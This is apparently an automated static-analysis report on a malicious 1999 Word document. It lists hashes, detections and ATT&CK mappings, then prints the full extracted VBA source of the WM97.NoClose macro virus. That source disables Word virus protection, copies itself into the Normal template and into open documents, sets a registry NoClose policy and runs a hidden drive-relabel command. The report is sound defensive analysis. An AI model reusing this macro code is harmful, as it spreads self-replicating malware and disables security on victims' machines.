Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 91245fb0977b9dc4…

MALICIOUS

Office (OLE)

Size: 33.0 KB
Created: 1999-04-16 20:22:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: 6611c5f92925201e5de3700fa07b4175
SHA-1: 37e8f0e02055504ec6667a8f57b3619b09ad92a0
SHA-256: 91245fb0977b9dc4736e74916f7cfd4a92525d72ddc131f4a4b65c11517230d0
Risk score: 300

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1547.001 Registry Run Keys / Startup Folder

The sample contains a legacy WordBasic AutoClose macro that attempts to disable virus protection and save a VBA component to 'c:\windows\system\no32close.sys'. It also attempts to set a registry value 'HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoClose' to '01' and execute 'label c: WM_NoClose', indicating an attempt at persistence or system modification. The macro's intent is to disable security features and potentially establish a foothold.

Heuristics 6

  • ClamAV: Doc.Trojan.Closer-1 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Closer-1
  • VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA (critical, OLE_VBA_SHELL)
    Shell() call in VBA
  • Auto_Close macro (high, OLE_VBA_AUTOCLOSE)
    Auto_Close macro
  • VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 3044 bytes
SHA-256: 81790b32ce3ddf6357f02505424b3ef7c4f57fecdb9cd53e376914aedd37e191
Detection: ClamAV: Win.Trojan.C-286
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "noclose"
Sub AutoClose()
On Error Resume Next
Randomize

With Application
    .ActiveDocument.ReadOnlyRecommended = False
    .DisplayAlerts = wdAlertsNone
    .EnableCancelKey = wdCancelDisabled
    .ScreenUpdating = False
    .ShowVisualBasicEditor = False
    .StatusBar = "WM97.NoClose -=[Jack Twoflower]=-"
End With
With Options
    .VirusProtection = False
    .SaveNormalPrompt = False
    .ConfirmConversions = False
End With

Set ad = ActiveDocument.VBProject.VBComponents
Set nt = NormalTemplate.VBProject.VBComponents

z$ = "c:\windows\system\no32close.sys"
n$ = "noclose"

Application.VBE.ActiveVBProject.VBComponents(n$).Export z$

ai = 0
ni = 0

For i = 1 To nt.Count
    If nt(i).Name = n$ Then ni = 1
Next i

For i = 1 To ad.Count
    If ad(i).Name = n$ Then ai = 1
Next i

If ni = 0 Then nt.import z$: NormalTemplate.Save
If ai = 0 Then ad.import z$: ActiveDocument.Save

If Day(Now()) = Int((Rnd * 31) + 1) Then
    System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NoClose") = "01"
    Shell ("label c: WM_NoClose"), vbHide
End If
End Sub

Sub ExtrasMakro()
Dim x

ReDim Combobox1__$(0)
Combobox1__$(0) = ""
ReDim Textbox1__$(0)
Textbox1__$(0) = ""
ReDim DropListBox2__$(0)

DropListBox2__$(0) = "Normal.dot (Globale Dokumentvorlage)"

WordBasic.BeginDialog 620, 280, "Makros"
    WordBasic.Text 7, 6, 93, 13, "Makro&name:", "Text3"
    WordBasic.ComboBox 7, 23, 435, 170, Combobox1__$(), "Combobox1"
    WordBasic.PushButton 470, 14, 137, 21, "&Ausführen", "Definierbar2"
    WordBasic.CancelButton 470, 38, 137, 21
    WordBasic.PushButton 470, 72, 137, 21, "&Schrittweise prüfen", "Definierbar3"
    WordBasic.PushButton 470, 96, 137, 21, "&Bearbeiten", "Definierbar4"
    WordBasic.PushButton 470, 130, 137, 21, "&Erstellen", "Definierbar5"
    WordBasic.PushButton 470, 154, 137, 21, "&Organisieren", "Definierbar6"
    WordBasic.PushButton 470, 178, 137, 21, "&Organisieren...", "Definierbar7"
    WordBasic.Text 7, 200, 93, 13, "Ma&kros in:", "Text1"
    WordBasic.DropListBox 90, 196, 354, 19, DropListBox2__$(), "Listbox2"
    WordBasic.Text 7, 222, 109, 13, "Beschreibung:", "Text2"
    WordBasic.TextBox 7, 235, 437, 38, Textbox1__$()
WordBasic.EndDialog
 
Dim dlg As Object: Set dlg = WordBasic.CurValues.UserDialog
x = WordBasic.Dialog.UserDialog(dlg)
Select Case x
    Case 0
        WordBasic.Cancel
    Case 1 To 6
        WordBasic.MsgBox "Nicht genug Arbeitsspeicher! Schließen Sie eine oder mehrere Anwendungen!", "WordBasic Fehler=7", 48
End Select
End Sub
Sub AnsichtVBCode()
End Sub
Sub AnsichtCode()
End Sub
Sub FormatFormatvorlage()
End Sub
Sub DateiDokVorlage()
End Sub